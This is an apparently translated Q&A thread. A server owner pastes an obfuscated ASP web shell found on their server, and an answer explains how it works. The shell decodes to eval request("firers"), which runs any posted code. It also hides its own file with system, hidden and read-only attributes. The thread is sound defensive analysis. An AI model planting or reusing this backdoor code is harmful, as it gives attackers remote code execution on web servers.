VB恶意软件工具逆向工程

Question

我在我的服务器上发现了有趣的恶意软件，这做了一些坏事。现在我正在尝试反向工程，但由于完全缺乏VB\ASP的知识，我需要您的帮助，同事们。

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function

Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if  f.attributes <> 39 then
f.attributes = 39
end if
%>

正如我所理解的，它执行一些命令，并在某个地方创建带有system\隐藏属性的文件。主要的问题是-如何使用它，即从我看到的日志，黑客上传了这个文件并使用POST命令这个文件。我也想命令这一点来理解，他是如何能够上传文件到一些文件夹，他应该能够这样做。

欢迎任何建议。带卷发的样本会很棒。

Answer 1

不，不需要VB中的知识来研究该代码的功能；只需阅读文档即可。

MorfiCoder(")/*/srerif/*/(tseuqer lave")返回eval request("firers") (我假设像Replace或StrReverse这样的函数是显而易见的)。

Execute和eval是不言自明的；request的文档是这里。

请求对象检索客户端浏览器在HTTP请求期间传递给服务器的值。

因此，无论firers请求变量中的字符串是什么，它都将被执行(您已经知道攻击者使用了一个简单的POST来向他的脚本发送数据)。

Set fso=CreateObject("Scripting.FileSystemObject")创建一个FileSystemObject对象。

Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")) 创建 a File对象(https://msdn.microsoft.com/en-us/library/aa242698(v=vs.60%29.aspx)；使用PATH_TRANSLATED中的路径)。

然后在该文件对象上设置一些attributes (Archive、System、Hidden、ReadOnly) (以隐藏此脚本)。

为什么攻击者能够将此文件上载到您的服务器显然无法得到您所提供的信息的回答，并且可能也超出了这个问题的范围，并且可能会脱离主题而导致堆栈溢出。